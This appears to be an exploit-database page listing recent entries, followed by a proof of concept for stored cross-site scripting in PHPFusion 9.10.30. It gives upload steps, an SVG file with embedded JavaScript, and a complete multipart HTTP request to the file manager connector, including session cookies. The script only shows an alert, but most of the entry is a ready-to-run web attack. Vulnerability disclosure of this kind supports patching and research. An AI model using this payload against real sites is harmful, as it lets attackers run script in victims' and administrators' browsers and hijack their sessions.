
19 changes to exploits/shellcodes/ghdb FS-S3900-24T4S - Privilege Escalation Virtual Reception v1.0 - Web Server Directory Traversal admidio v4.2.5 - CSV Injection Companymaps v8.0 - Stored Cross Site Scripting (XSS) GLPI 9.5.7 - Username Enumeration OpenEMR v7.0.1 - Authentication credentials brute force PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS) PHPJabbers Simple CMS 5.0 - SQL Injection PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) phpMyFAQ v3.1.12 - CSV Injection projectSend r1605 - Private file download revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Serendipity 2.4.0 - File Inclusion RCE SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Advanced Host Monitor v12.56 - Unquoted Service Path MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control
100 lines
No EOL
3.4 KiB
Text
100 lines
No EOL
3.4 KiB
Text
Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
|
|
Application: PHPFusion
|
|
Version: 9.10.30
|
|
Bugs: XSS
|
|
Technology: PHP
|
|
Vendor URL: https://www.php-fusion.co.uk/home.php
|
|
Software Link: https://sourceforge.net/projects/php-fusion/
|
|
Date of found: 28-04-2023
|
|
Author: Mirabbas Ağalarov
|
|
Tested on: Linux
|
|
|
|
|
|
2. Technical Details & POC
|
|
========================================
|
|
steps:
|
|
|
|
1. Go to Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
|
|
2. upload malicious svg file
|
|
|
|
svg file content ===>
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert(document.location);
|
|
</script>
|
|
</svg>
|
|
|
|
|
|
poc request:
|
|
|
|
|
|
POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 1198
|
|
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
|
|
sec-ch-ua-platform: "Linux"
|
|
sec-ch-ua-mobile: ?0
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Accept: */*
|
|
Origin: http://localhost
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Dest: empty
|
|
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
|
|
Connection: close
|
|
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="reqid"
|
|
|
|
187c77be8e52cf
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="cmd"
|
|
|
|
upload
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="target"
|
|
|
|
l1_Lw
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"
|
|
|
|
SVG_XSS.svg
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
|
|
Content-Type: image/svg+xml
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert(document.location);
|
|
</script>
|
|
</svg>
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="mtime[]"
|
|
|
|
1681116842
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA
|
|
Content-Disposition: form-data; name="overwrite"
|
|
|
|
0
|
|
------WebKitFormBoundaryxF2jB690PpLWInAA--
|
|
|
|
|
|
3. Then go to images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or directly go to svg file(
|
|
http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)
|
|
|
|
|
|
|
|
poc video : https://youtu.be/6yBLnRH8pOY |